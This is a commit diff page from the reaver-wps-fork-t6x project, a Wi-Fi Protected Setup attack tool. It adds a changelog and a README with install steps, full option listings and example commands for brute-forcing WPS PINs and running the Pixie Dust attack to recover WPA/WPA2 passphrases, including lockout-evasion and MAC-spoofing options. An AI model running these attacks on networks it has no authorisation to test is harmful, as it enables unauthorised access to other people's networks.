Commit 8ffb88207d665caca0193f003dec2ce58480c147 - reaver

+100

-0

CHANGELOG.md less more

	0	## Change Log
	1
	2	## (04/06/2015)
	3	- [89288d9](https://github.com/t6x/reaver-wps-fork-t6x/commit/89288d983b9057b3124718d4edd4983a7114d333) Added -H PixieHash logging option in reaver (@d8tahead)
	4	- [ea796ee](https://github.com/t6x/reaver-wps-fork-t6x/commit/ea796ee05b0ac712477d8adc6e79c347c2a57635) Reaver pixie data in new verbose mode (-vvv) (@t6x)
	5	- [f26803e](https://github.com/t6x/reaver-wps-fork-t6x/commit/f26803e9fc9f656d7d26d822fb6d6de830dcd8ad) Zyxel default pin generator (@kib0rg)
	6	- [845501b](https://github.com/t6x/reaver-wps-fork-t6x/commit/845501b351fca4c16b7a460b857c28b73302ee10) Makefile Cflag, parallel fix (@t6x)
	7	- [845501b](https://github.com/t6x/reaver-wps-fork-t6x/commit/845501b351fca4c16b7a460b857c28b73302ee10) Fix some compiler warnings (@t6x)
	8	- [845501b](https://github.com/t6x/reaver-wps-fork-t6x/commit/845501b351fca4c16b7a460b857c28b73302ee10) Fix drop faulty (@t6x)
	9	- [845501b](https://github.com/t6x/reaver-wps-fork-t6x/commit/845501b351fca4c16b7a460b857c28b73302ee10) Wpsmon use less space in output (@t6x)
	10	- [845501b](https://github.com/t6x/reaver-wps-fork-t6x/commit/845501b351fca4c16b7a460b857c28b73302ee10) Fix wash probe request (@t6x)
	11
	12	## (31/05/2015)
	13	- [a41ae4f](https://github.com/t6x/reaver-wps-fork-t6x/commit/a41ae4fd3ee4f9091d74a2ea8f2a9f4227b66c9c) Bug Fix, Pixewps mutual exclusivity with -r and -S options (@ldm314)
	14
	15	## (15/05/2015)
	16	- [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Bug Fix, reaver -g option (@t6x)
	17	- [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Bug Fix, reaver -p option (@t6x)
	18	- [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Bug Fix, fix M7 Message (@t6x)
	19	- [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Bug Fix, fix time out in M3 or M5 message (@t6x)
	20	- [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Wash Ignore FCS by default (-C option)(@t6x)
	21	- [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Credits (@t6x)
	22	- [63c5c02](https://github.com/t6x/reaver-wps-fork-t6x/commit/63c5c02bfc44e732399118d844906b0708e8e28c) Change Log (@t6x)
	23
	24	## (11/05/2015)
	25	- [ead842c](https://github.com/t6x/reaver-wps-fork-t6x/commit/ead842cf17a160e6fcc0f396066c4da758912593) Bug Fix (@t6x)
	26
	27	## (04/05/2015)
	28	- [68515bd](https://github.com/t6x/reaver-wps-fork-t6x/commit/68515bd90d9c952992bfe0d152c069a8e25521bf) Improved code (@t6x)
	29	- [a28b0af](https://github.com/t6x/reaver-wps-fork-t6x/commit/a28b0af2a909394156fa699a1fa3750d10ff0613) Improved code, updating to use -f option of pixiewps (@t6x)
	30	- [714fdcf](https://github.com/t6x/reaver-wps-fork-t6x/commit/714fdcf005be92dc58db31ca1a51f5c27ea19d4f) Updated build reaver instructions (@soxrok2212)
	31	- [c69503a](https://github.com/t6x/reaver-wps-fork-t6x/commit/c69503a4d485b06ca601329332cde67c64a8aa55) Update wpsmon.c (@t6x)
	32	- [ab303ae](https://github.com/t6x/reaver-wps-fork-t6x/commit/ab303aeb4aaef04709c741e880525c635b7dc8ce) Update wpscrack.c (@t6x)
	33	- [679bf56](https://github.com/t6x/reaver-wps-fork-t6x/commit/679bf56e1d6a3436adf15a78f3dbff8c032ee62b) Update README.md (@t6x)
	34
	35	## (02/05/2015)
	36	- [a29e53f](https://github.com/t6x/reaver-wps-fork-t6x/commit/a29e53fdc3f7520aa7228ad3438d5054676af55d) Fixed bad pin parsing (@wiire)
	37
	38	## (28/04/2015)
	39	- [88b0a90](https://github.com/t6x/reaver-wps-fork-t6x/commit/88b0a90d0f871be118ac8f96fa676b5be7c56ea3) Update wps_registrar.c (@d8tahead)
	40	- [61a96dc](https://github.com/t6x/reaver-wps-fork-t6x/commit/61a96dc8b5b41e386591e36a758f6b9711218557) Add R-Nonce and Model Name output (@t6x)
	41	- [485a6b8](https://github.com/t6x/reaver-wps-fork-t6x/commit/485a6b8b7bbac8433ddf4b04f1cd1a885e3d6261) Add Model Name in output (@t6x)
	42
	43	## (27/04/2015)
	44	- [cccae8d](https://github.com/t6x/reaver-wps-fork-t6x/commit/cccae8d0a0b0f980c29861bec02152ac07d505e5) Update wps_registrar.c (@d8tahead)
	45	- [34583f6](https://github.com/t6x/reaver-wps-fork-t6x/commit/34583f62416e29f4226c2769e524607feb5f6b86) Update wps_registrar.c (@d8tahead)
	46
	47	## (26/04/2015)
	48	- [086e4d9](https://github.com/t6x/reaver-wps-fork-t6x/commit/086e4d9d5aaa166940c9e507edaf4e359a2ed59a) Added [P] R-Nonce for future pixiewps use :) (@d8tahead)
	49
	50	## (21/04/2015)
	51	- [94cd799](https://github.com/t6x/reaver-wps-fork-t6x/commit/94cd79967d09eedd43f151b3992e335ecff7479d) Update globule.c (@d8tahead)
	52	- [2166159](https://github.com/t6x/reaver-wps-fork-t6x/commit/2166159f8534c46d8d9250558fb9bd36c0aa9aae) Update globule.h (@d8tahead)
	53	- [866919b](https://github.com/t6x/reaver-wps-fork-t6x/commit/866919b9cf08e19e08152b422ddd0a5d4b42f494) Update exchange.c (@d8tahead)
	54	- [f767655](https://github.com/t6x/reaver-wps-fork-t6x/commit/f767655b0254758048aed44bfb77981d66028a20) Serial number printf fix (@soxrok2212)
	55
	56	## (20/04/2015)
	57	- [ae579a1](https://github.com/t6x/reaver-wps-fork-t6x/commit/ae579a1eef4f5e00958c44ae9bc1d1af6e0ab1f1) Update README.md (@d8tahead)
	58
	59	## (19/04/2015)
	60	- [2e41e9f](https://github.com/t6x/reaver-wps-fork-t6x/commit/2e41e9fc1fc48b2beab1a2c99a56b705712d7a7d) Special realtek note (@soxrok2212)
	61	- [2e9c7af](https://github.com/t6x/reaver-wps-fork-t6x/commit/2e9c7af5b5c100b6dedec8651afa867cbe1541b2) Update README.md (@soxrok2212)
	62	- [9310bab](https://github.com/t6x/reaver-wps-fork-t6x/commit/9310babf80988d9a955ca55aae7072fdb1fea39f) Small fix (@soxrok2212)
	63	- [9358bf3](https://github.com/t6x/reaver-wps-fork-t6x/commit/9358bf38af5f0c254261745f05583c7242e5e0a7) A few more small fixes (@soxrok2212)
	64	- [a2bdeda](https://github.com/t6x/reaver-wps-fork-t6x/commit/a2bdeda3987e0328c1782117a7eb7ec79b033ccf) Grammer and Craig Heffner credit (@soxrok2212)
	65	- [b3be5fb](https://github.com/t6x/reaver-wps-fork-t6x/commit/b3be5fb95c86e577ac26bf06cb46f28a2d2052e3) Update wpsmon.c (@d8tahead)
	66
	67	## (18/04/2015)
	68	- [e20ba7d](https://github.com/t6x/reaver-wps-fork-t6x/commit/e20ba7d7920b21e9dfb0d4f7a1ef564d86037087) Changes in pixiewps use, idea soxrok2212 (@t6x)
	69	- [c6d2474](https://github.com/t6x/reaver-wps-fork-t6x/commit/c6d2474378d19c88cd1470e753a2c71aeeed58fc) Ideia by Soxrok2212, serial print in wash with option -g (@t6x)
	70
	71	## (17/04/2015)
	72	- [7298416](https://github.com/t6x/reaver-wps-fork-t6x/commit/7298416d1102a2d546eee0fa72a6445b565a59de) Merge with DataHead branch (@t6x)
	73
	74	## (16/04/2015)
	75	- [1a0994b](https://github.com/t6x/reaver-wps-fork-t6x/commit/1a0994b6b3b4b8424d8f31e8653ce010bf0d14e7) Credits devttys0 (@t6x)
	76	- [37032a5](https://github.com/t6x/reaver-wps-fork-t6x/commit/37032a5b2d351b80ad472df5947987f156d1b7fd) Default pin generator by devttys0 (@t6x)
	77
	78	## (15/04/2015)
	79	- [8d0ef55](https://github.com/t6x/reaver-wps-fork-t6x/commit/8d0ef55d244fb75138cce6e94921cf230f110b9b) Credits (@t6x)
	80	- [d65da86](https://github.com/t6x/reaver-wps-fork-t6x/commit/d65da863530822d83627457a44a9e94ba1617ab6) Reaver serial number output verbose (@t6x)
	81	- [433636e](https://github.com/t6x/reaver-wps-fork-t6x/commit/433636ef5e87a69d84531c15d312beeade597863) Update README.md (@t6x)
	82	- [1da780f](https://github.com/t6x/reaver-wps-fork-t6x/commit/1da780f3e6d460814561de888457133198cd1597) Suggestion made by kcdtv, -g option in wash (@t6x)
	83	- [a5887a3](https://github.com/t6x/reaver-wps-fork-t6x/commit/a5887a344485d0ebea119fc4ffb62aa23e2fd494) Update argsparser.c
	84
	85	## (14/04/2015)
	86	- [49da190](https://github.com/t6x/reaver-wps-fork-t6x/commit/49da190b74de4dac061932a153519e0f0b470812) DataHead Mod (@t6x)
	87	- [4b8e614](https://github.com/t6x/reaver-wps-fork-t6x/commit/4b8e6148842a552e9d3cb63b23e24a39dfff9f38) Wash output piped option (@t6x)
	88
	89	## (13/04/2015)
	90	- [ab614cc](https://github.com/t6x/reaver-wps-fork-t6x/commit/ab614cce81cb1625b14e4702dfbe548fea4174d4) Update README.md (@t6x)
	91	- [4cbab1c](https://github.com/t6x/reaver-wps-fork-t6x/commit/4cbab1c8e45118dc8fcb4b00499e4fe08feebf7f) Bug Fixes (@t6x)
	92
	93	## (12/04/2015)
	94	- [9756028](https://github.com/t6x/reaver-wps-fork-t6x/commit/9756028c2ea1c658a7ecab0e9cddd9b9a2c4b607) Update README.md (@t6x)
	95	- [dc9e2b0](https://github.com/t6x/reaver-wps-fork-t6x/commit/dc9e2b0d678ef313827c3cafcef916678d1d116c) Create README.md (@t6x)
	96	- [68b3897](https://github.com/t6x/reaver-wps-fork-t6x/commit/68b38976e51a07cf4ca7c282a7a5582ba4b019a7) Automatic get pass (idea made by nooro) (@t6x)
	97
	98	## (11/04/2015)
	99	- [f52c553](https://github.com/t6x/reaver-wps-fork-t6x/commit/f52c553bbff05e8fa03d64732d772f04e099c90c) First commit (@t6x)

+169

-114

README.md less more

	0	# Overview
0	1
1		#Overview
2		reaver-wps-fork-t6x is a modification done from a fork of reaver (https://code.google.com/p/reaver-wps-fork/)
3		This modified version uses the Pixie Dust Attack to find the correct WPS PIN.
4		This attack works against many Ralink, Broadcom, and Realtek APs
5		The attack used in this version was developed by Wiire (https://github.com/wiire/pixiewps)
	2	Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a wide variety of access points and WPS implementations.
6	3
7		#Install Required Libraries and Tools
	4	The original Reaver implements a online brute force attack against, as described in [http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf](http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf).
	5	reaver-wps-fork-t6x is a community forked version, which has included various bug fixes and additional attack method (the offline Pixie Dust attack).
8	6
9		Libraries for reaver
10		sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev
11
12		Tools
13		You must install Pixiewps by Wiire (https://github.com/wiire/pixiewps)
	7	Depending on the target's Access Point (AP), to recover the plain text WPA/WPA2 passphrase the average amount of time for the transitional online brute force method is between 4-10 hours. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
	8	When using the offline attack, if the AP is vulnerable, it may take only a matter of seconds to minutes.
14	9
	10	* The original Reaver (v1.4) can be found here: [https://code.google.com/p/reaver-wps/](https://code.google.com/p/reaver-wps/).
	11	* The discontinued community edition of Reaver (v1.5) that was used as the starting point: [https://code.google.com/p/reaver-wps-fork/](https://code.google.com/p/reaver-wps-fork/).
	12	* reaver-wps-fork-t6x community edition of Reaver (which includes the Pixie Dust attack): [https://github.com/t6x/reaver-wps-fork-t6x](https://github.com/t6x/reaver-wps-fork-t6x).
	13	* For more information about the Pixie Dust attack (including which APs are vulnerable) can be found here: [https://github.com/wiire/pixiewps](https://github.com/wiire/pixiewps),
	14	[https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)) & [https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?usp=sharing](https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?usp=sharing)
15	15
16		#Compile and Install
	16	- - -
17	17
18		Build Reaver
19
20		cd reaver-wps-fork-t6x-master
21		cd src
22		./configure
23		make
	18	# Requirements
24	19
25		Install Reaver
26
27		sudo make install
28
29		#Reaver Usage
	20	```
	21	apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps
	22	```
	23	_The example uses [Kali Linux](https://www.kali.org/) as the Operating System (OS) as `pixiewps` is included._
30	24
31		Reaver v1.5.2 WiFi Protected Setup Attack Tool
32		Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
33		mod by t6_x <[email protected]> & DataHead & Soxrok2212
	25	You must already have Wiire's Pixiewps installed.
	26	The latest version can be found here: [https://github.com/wiire/pixiewps](https://github.com/wiire/pixiewps).
34	27
35		Required Arguments:
36		-i, --interface=<wlan> Name of the monitor-mode interface to use
37		-b, --bssid=<mac> BSSID of the target AP
	28	- - -
38	29
39		Optional Arguments:
40		-m, --mac=<mac> MAC of the host system
41		-e, --essid=<ssid> ESSID of the target AP
42		-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
43		-o, --out-file=<file> Send output to a log file [stdout]
44		-s, --session=<file> Restore a previous session file
45		-C, --exec=<command> Execute the supplied command upon successful pin recovery
46		-D, --daemonize Daemonize reaver
47		-a, --auto Auto detect the best advanced options for the target AP
48		-f, --fixed Disable channel hopping
49		-5, --5ghz Use 5GHz 802.11 channels
50		-v, --verbose Display non-critical warnings (-vv for more)
51		-q, --quiet Only display critical messages
52		-K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek)
53		-Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if pixiewps attack is successful
54		-h, --help Show help
	30	# Setup
55	31
56		Advanced Options:
57		-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
58		-d, --delay=<seconds> Set the delay between pin attempts [1]
59		-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
60		-g, --max-attempts=<num> Quit after num pin attempts
61		-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
62		-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
63		-t, --timeout=<seconds> Set the receive timeout period [5]
64		-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
65		-A, --no-associate Do not associate with the AP (association must be done by another application)
66		-N, --no-nacks Do not send NACK messages when out of order packets are received
67		-S, --dh-small Use small DH keys to improve crack speed
68		-L, --ignore-locks Ignore locked state reported by the target AP
69		-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
70		-n, --nack Target AP always sends a NACK [Auto]
71		-w, --win7 Mimic a Windows 7 registrar [False]
72		-X, --exhaustive Set exhaustive mode from the beginning of the session [False]
73		-1, --p1-index Set initial array index for the first half of the pin [False]
74		-2, --p2-index Set initial array index for the second half of the pin [False]
75		-P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
76		-W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
	32	Download
77	33
78		Example:
79		reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1
80
81		#Option (K)
	34	`git clone https://github.com/t6x/reaver-wps-fork-t6x`
82	35
83		The -K option 1 runs pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and the Authkey. pixiewps will try to attack Ralink, Broadcom and Realtek
84		*Special note: if you are attacking a Realtek AP, do NOT use small DH Keys (-S)
	36	or
85	37
86		#Option (P) in reaver
87		Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
	38	`wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip && unzip master.zip`
88	39
89		This option was made with intent of:
	40	Build
90	41
91		----Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets , routers etc..
	42	```bash
	43	cd reaver-wps-fork-t6x*/
	44	cd src/
	45	./configure
	46	make
	47	```
92	48
93		----Time sensistive attacks where the hash collecting continues repetitively until your time frame is met.
	49	Install
94	50
95		----For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case.
	51	`sudo make install`
96	52
97		#Wash Usage
	53	- - -
98	54
99		Wash v1.5.2 WiFi Protected Setup Scan Tool
100		Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
101		mod by t6_x <[email protected]> & DataHead & Soxrok2212
	55	# Reaver Usage
102	56
103		Required Arguments:
104		-i, --interface=<iface> Interface to capture packets on
105		-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
	57	```
	58	Reaver v1.5.3 WiFi Protected Setup Attack Tool
	59	Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
	60	mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft
106	61
107		Optional Arguments:
108		-c, --channel=<num> Channel to listen on [auto]
109		-o, --out-file=<file> Write data to file
110		-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
111		-D, --daemonize Daemonize wash
112		-C, --ignore-fcs Ignore frame checksum errors
113		-5, --5ghz Use 5GHz 802.11 channels
114		-s, --scan Use scan mode
115		-u, --survey Use survey mode [default]
116		-P, --file-output-piped Allows Wash output to be piped. Example. wash x\|y\|z...
117		-g, --get-chipset Pipes output and runs reaver alongside to get chipset
118		-h, --help Show help
	62	Required Arguments:
	63	-i, --interface=<wlan> Name of the monitor-mode interface to use
	64	-b, --bssid=<mac> BSSID of the target AP
119	65
120		Example:
121		wash -i mon0
122
123
124		#Option (g)
125		The option -g of wash, automatically runs the reaver to receive the chipset data.
126		If the AP does not respond to them quickly, this option will be slow to display the data,
127		because the reaver will stay running until getting the data or until you reach your timeout limit (30 secs)
128
	66	Optional Arguments:
	67	-m, --mac=<mac> MAC of the host system
	68	-e, --essid=<ssid> ESSID of the target AP
	69	-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
	70	-o, --out-file=<file> Send output to a log file [stdout]
	71	-s, --session=<file> Restore a previous session file
	72	-C, --exec=<command> Execute the supplied command upon successful pin recovery
	73	-D, --daemonize Daemonize reaver
	74	-a, --auto Auto detect the best advanced options for the target AP
	75	-f, --fixed Disable channel hopping
	76	-5, --5ghz Use 5GHz 802.11 channels
	77	-v, --verbose Display non-critical warnings (-vv for more)
	78	-q, --quiet Only display critical messages
	79	-K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom & Realtek)
	80	-Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful
	81	-h, --help Show help
129	82
130		#Contribution
131		Modifications made by t6_x, DataHead, Soxrok2212
	83	Advanced Options:
	84	-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
	85	-d, --delay=<seconds> Set the delay between pin attempts [1]
	86	-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
	87	-F, --fake-delay=<seconds> Set the time to sleep after received fake NACK [0]
	88	-R, --fake-reason=<nack reason> Specifies the reason code for NACK used in the FAKE NACK
	89	-I, --ignore-reason Ignore change of reason code for NACK
	90	-g, --max-attempts=<num> Quit after num pin attempts
	91	-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
	92	-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
	93	-t, --timeout=<seconds> Set the receive timeout period [5]
	94	-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
	95	-A, --no-associate Do not associate with the AP (association must be done by another application)
	96	-N, --no-nacks Do not send NACK messages when out of order packets are received
	97	-S, --dh-small Use small DH keys to improve crack speed
	98	-L, --ignore-locks Ignore locked state reported by the target AP
	99	-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
	100	-n, --nack Target AP always sends a NACK [Auto]
	101	-w, --win7 Mimic a Windows 7 registrar [False]
	102	-X, --exhaustive Set exhaustive mode from the beginning of the session [False]
	103	-1, --p1-index Set initial array index for the first half of the pin [False]
	104	-2, --p2-index Set initial array index for the second half of the pin [False]
	105	-P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
	106	-W, --generate-pin Default Pin Generator [1] Belkin [2] D-Link [3] Zyxel
	107	-H, --pixiedust-log Enables logging of sequence completed PixieHashes
132	108
133		Some ideas made by nuroo, kcdtv
	109	Example:
	110	reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vvv -K 1
	111	```
134	112
135		#Special Thanks
136		Soxrok2212 for all work done to help in the development of tools
137		Wiire for developing Pixiewps
138		Craig Heffner for creating Reaver and for the creation of default pin generators (D-Link, Belkin)
139		(http://www.devttys0.com/)
	113	## -K // --pixie-dust
	114
	115	The `-K 1` option performs the offline attack, Pixie Dust _(`pixiewps`)_, by automatically passing the PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey variables. `pixiewps` will then try to attack Ralink, Broadcom and Realtek detected chipset.
	116	Special note: If you are attacking a Realtek AP, do NOT use small DH Keys (`-S`) option.
	117
	118	## -H // --pixiedust-log
	119
	120	The `-H` option is a switch to enable logging of PixieHashes, saved hashes will be saved in the executing directory.
	121	This option requires you to have at the least `-vvv` switch on and will work with `-K 1` & `-P` appropriately.
	122
	123	The files saved are named after the bssid (MAC) of the target, and with an extention of `.pixie`.
	124	On the inside of these saved logs, you will find all the required PixieDust hashes, along with a quick copy & paste ready full command to use it on `pixiewps`. You also have the option to execute it. Just pop in the file into your favorite shell, and execute it _(`chmod +x <filename>` may be required)_.
	125
	126	## -P // --pixiedust-loop
	127
	128	When using the `-P` option, Reaver goes into a loop mode that breaks the WPS protocol by not using M4 message to hopefully avoid lockouts.
	129	This is to ONLY be used for PixieHash collecting to use with `pixiewps`, NOT to brute force 'online' pins.
	130
	131	This option was made with intent of:
	132
	133	* Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets, routers etc..
	134	* Time sensitive attacks where the hash collecting continues repetitively until your time frame is met.
	135	* For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your use case.
	136
	137	- - -
	138
	139	# Wash Usage
	140
	141	```
	142	Wash v1.5.3 WiFi Protected Setup Scan Tool
	143	Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
	144	mod by t6_x<[email protected]>, DataHead, Soxrok2212, Wiire, AAnarchYY & rofl0r
	145
	146	Required Arguments:
	147	-i, --interface=<iface> Interface to capture packets on
	148	-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
	149
	150	Optional Arguments:
	151	-c, --channel=<num> Channel to listen on [auto]
	152	-o, --out-file=<file> Write data to file
	153	-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
	154	-D, --daemonize Daemonize wash
	155	-5, --5ghz Use 5GHz 802.11 channels
	156	-s, --scan Use scan mode
	157	-u, --survey Use survey mode [default]
	158	-P, --output-piped Allows Wash output to be piped. Example. wash x\|y\|z...
	159	-g, --get-chipset Pipes output and runs reaver alongside to get chipset
	160	-a, --all Show all APs, even those without WPS
	161	-h, --help Show help
	162
	163	Example:
	164	wash -i wlan0mon
	165	```
	166
	167	## -g // --get-chipset
	168
	169	The option `-g` of Wash automatically runs Reaver to receive the chipset data.
	170	If the AP does not respond to them quickly, this option will be slow to display the data, because Reaver will stay running until it receives the data or until you reach your timeout limit (30 seconds).
	171
	172	## -a // --all
	173
	174	The option `-a` of Wash will list all access points, including those without WPS enabled.
	175	- - -
	176
	177	# Acknowledgements
	178
	179	## Contribution
	180
	181	Modifications made by:
	182	`t6_x`, `DataHead`, `Soxrok2212`, `Wiire`, `AAnarchYY`, `kib0rg`, `KokoSoft`, `rofl0r`, `horrorho`
	183
	184	Some ideas made by:
	185	`nuroo`, `kcdtv`
	186
	187	Bug fixes made by:
	188	`alxchk`, `USUARIONUEVO`, `ldm314`, `vk496`, `falsovsky`, `rofl0r`, `xhebox`
	189
	190	## Special Thanks
	191
	192	* `Soxrok2212` for all work done to help in the development of tools
	193	* `Wiire` for developing Pixiewps
	194	* `Craig Heffner` for creating Reaver and for the creation of default pin generators (D-Link, Belkin) - http://www.devttys0.com/

+13

-13

docs/README.REAVER less more

1	1
2	2	Usually, the only required arguments to Reaver are the interface name and the BSSID of the target AP:
3	3
4		# reaver -i mon0 -b 00:01:02:03:04:05
	4	# reaver -i wlan0mon -b 00:01:02:03:04:05
5	5
6	6	It is suggested that you run Reaver in verbose mode in order to get more detailed information about
7	7	the attack as it progresses:
8	8
9		# reaver -i mon0 -b 00:01:02:03:04:05 -vv
	9	# reaver -i wlan0mon -b 00:01:02:03:04:05 -vv
10	10
11	11	The channel and SSID (provided that the SSID is not cloaked) of the target AP will be automatically
12	12	identified by Reaver, unless explicitly specified on the command line:
13	13
14		# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
	14	# reaver -i wlan0mon -b 00:01:02:03:04:05 -c 11 -e linksys
15	15
16	16	Since version 1.3, Reaver implements the small DH key optimization as suggested by Stefan which can
17	17	speed up the attack speed:
18	18
19		# reaver -i mon0 -b 00:01:02:03:04:05 --dh-small
	19	# reaver -i wlan0mon -b 00:01:02:03:04:05 --dh-small
20	20
21	21	By default, if the AP switches channels, Reaver will also change its channel accordingly. However,
22	22	this feature may be disabled by fixing the interface's channel:
23	23
24		# reaver -i mon0 -b 00:01:02:03:04:05 --fixed
	24	# reaver -i wlan0mon -b 00:01:02:03:04:05 --fixed
25	25
26	26	When spoofing your MAC address, you must set the desired address to spoof using the ifconfig utility,
27	27	and additionally tell Reaver what the spoofed address is:
28	28
29		# reaver -i mon0 -b 00:01:02:03:04:05 --mac=AA:BB:CC:DD:EE:FF
	29	# reaver -i wlan0mon -b 00:01:02:03:04:05 --mac=AA:BB:CC:DD:EE:FF
30	30
31	31	The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary
32	32	(minimum timeout period is 1 second):
33	33
34		# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
	34	# reaver -i wlan0mon -b 00:01:02:03:04:05 -t 2
35	35
36	36	The default delay period between pin attempts is 1 second. This value can be increased or decreased
37	37	to any non-negative integer value. A value of zero means no delay:
38	38
39		# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
	39	# reaver -i wlan0mon -b 00:01:02:03:04:05 -d 0
40	40
41	41	Some APs will temporarily lock their WPS state, typically for five minutes or less, when "suspicious"
42	42	activity is detected. By default when a locked state is detected, Reaver will check the state every
43	43	315 seconds (5 minutes and 15 seconds) and not continue brute forcing pins until the WPS state is unlocked.
44	44	This check can be increased or decreased to any non-negative integer value:
45	45
46		# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
	46	# reaver -i wlan0mon -b 00:01:02:03:04:05 --lock-delay=250
47	47
48	48	The default timeout period for receiving the M5 and M7 WPS response messages is .1 seconds. This
49	49	timeout period can be set manually if necessary (max timeout period is 1 second):
50	50
51		# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
	51	# reaver -i wlan0mon -b 00:01:02:03:04:05 -T .5
52	52
53	53	Some poor WPS implementations will drop a connection on the floor when an invalid pin is supplied
54	54	instead of responding with a NACK message as the specs dictate. To account for this, if an M5/M7 timeout

56	56	NACKS (most do), this feature can be disabled to ensure better reliability. This option is largely useless
57	57	as Reaver will auto-detect if an AP properly responds with NACKs or not:
58	58
59		# reaver -i mon0 -b 00:01:02:03:04:05 --nack
	59	# reaver -i wlan0mon -b 00:01:02:03:04:05 --nack
60	60
61	61	While most APs don't care, sending an EAP FAIL message to close out a WPS session is sometimes necessary.
62	62	By default this feature is disabled, but can be enabled for those APs that need it:
63	63
64		# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
	64	# reaver -i wlan0mon -b 00:01:02:03:04:05 --eap-terminate
65	65
66	66	When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this
67	67	may be a sign that the AP is rate limiting pin attempts or simply being overloaded, a sleep can be put in
68	68	place that will occur whenever these warning messages appear:
69	69
70		# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
	70	# reaver -i wlan0mon -b 00:01:02:03:04:05 --fail-wait=360

+2

-2

docs/README.WASH less more

1	1
2	2	Wash is a utility for identifying WPS enabled access points. It can survey from a live interface:
3	3
4		# wash -i mon0
	4	# wash -i wlan0mon
5	5
6	6	Or it can scan a list of pcap files:
7	7

19	19	By default, wash will perform a passive survey. However, wash can be instructed to send probe requests
20	20	to each AP in order to obtain more information about the AP:
21	21
22		# wash -i mon0 --scan
	22	# wash -i wlan0mon --scan
23	23
24	24	By sending probe requests, wash will illicit a probe response from each AP. For WPS-capable APs, the
25	25	WPS information element typically contains additional information about the AP, including make, model,

+79

-3

src/80211.c less more

38	38	const u_char *packet = NULL;
39	39
40	40	/* Loop until we get a valid packet, or until we run out of packets */
	41	#ifdef __APPLE__
